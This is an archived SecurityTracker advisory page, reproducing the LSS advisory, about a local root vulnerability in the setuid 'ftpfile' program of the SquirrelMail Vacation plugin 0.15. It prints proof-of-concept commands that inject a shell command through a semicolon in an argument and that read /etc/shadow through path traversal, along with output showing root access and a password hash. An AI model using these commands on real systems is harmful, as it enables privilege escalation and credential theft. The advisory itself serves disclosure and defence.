SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


Try our Premium Alert Service
 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service





Category:   Application (E-mail Server)  >   Squirrelmail Vacation Plugin Vendors:   SquirrelMail Development Team
Squirrelmail Vacation Plugin Lets Local Users Execute Arbitrary Commands With Root Privileges
SecurityTracker Alert ID:  1012866
SecurityTracker URL:  http://securitytracker.com/id/1012866
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 13 2005
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via local system, Root access via local system

Version(s): 0.15
Description:   A vulnerability was reported in Squirrelmail in the vacation plugin. A local user can view arbitrary files and execute arbitrary commands.

LSS reported that a local user can invoke the 'ftpfile' program to execute arbitrary commands with root privileges. The program, which is configured with set user id (setuid) root user privileges, does not properly validate user-supplied command line arguments before passing them to an execve() call. A demonstration exploit is provided:

ftpfile 0 root 0 get 0 "LSS-Security;id"

A local user can also invoke ftpfile to copy arbitrary files with root privileges to the user's home directory. A demonstratoin exploit is provided:

ftpfile localhost root root get ../../../../etc/shadow ./shadow

Leon Juranic is credited with discovering this flaw.

The vendor has been notified without response.

The original advisory is available at:

http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03

Impact:   A local user can execute arbitrary commands with root privileges.

A local user can copy arbitrary files with root privileges.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.squirrelmail.org/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  Squirrelmail vacation v0.15 local root exploit



			LSS Security Advisory #LSS-2005-01-03
			       http://security.lss.hr

---

Title			:  Squirrelmail vacation v0.15 local root exploit 
Advisory ID		:  LSS-2005-01-03
Date			:  10.01.2005. 
Advisory URL:		:  http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03
Impact			:  Privilege escalation and arbitrary file read
Risk level		:  High 
Vulnerability type	:  Local
Vendors contacted	:  No response from vendor


---



===[ Overview 

Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply
message to incoming email. That is commonly used to notify the sender of 
the receiver's absence. Vacation plugin specifically uses the Vacation program.
Plugin can be downloaded from:
http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz



===[ Vulnerability

Within Squirrelmail Vacation plugin there is suid root program 'ftpfile'.
The program is used to access local files in user's home directory. There is
a privilege escalation and arbitrary file read vulnerability in ftpfile. 
Command line arguments are passed to execve() function without checking
for meta-characters, therefore making possible execution of commands as root.

[ljuranic@laptop ljuranic]$ id
uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$  ftpfile 0 root 0 get 0 "LSS-Security;id"
/bin/cp: omitting directory `/root/0'
uid=0(root) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$ 

It is also possible to read restricted files (such as /etc/shadow), since
ftpfile can copy a file from user's home directory to any other
directory without checking file name for directory traversal attack.

$ ftpfile localhost root root get ../../../../etc/shadow ./shadow
./shadow[ljuranic@laptop ljuranic]$ head ./shadow
root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7:::
bin:*:10929:0:99999:7:::
daemon:*:10929:0:99999:7:::
lp:*:10929:0:99999:7:::
[ljuranic@laptop ljuranic]$ 



===[ Affected versions

Squirrelmail Vacation v0.15 and previous versions.



===[ Fix

Not available yet.



===[ PoC Exploit

http://security.lss.hr/exploits/



===[ Credits

Credits for this vulnerability goes to Leon Juranic. 



===[ LSS Security Contact
 
 LSS Security Team, <eXposed by LSS>
 
 WWW    : http://security.lss.hr
 E-mail : security@LSS.hr
 Tel	: +385 1 6129 775
  



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2018, SecurityGlobal.net LLC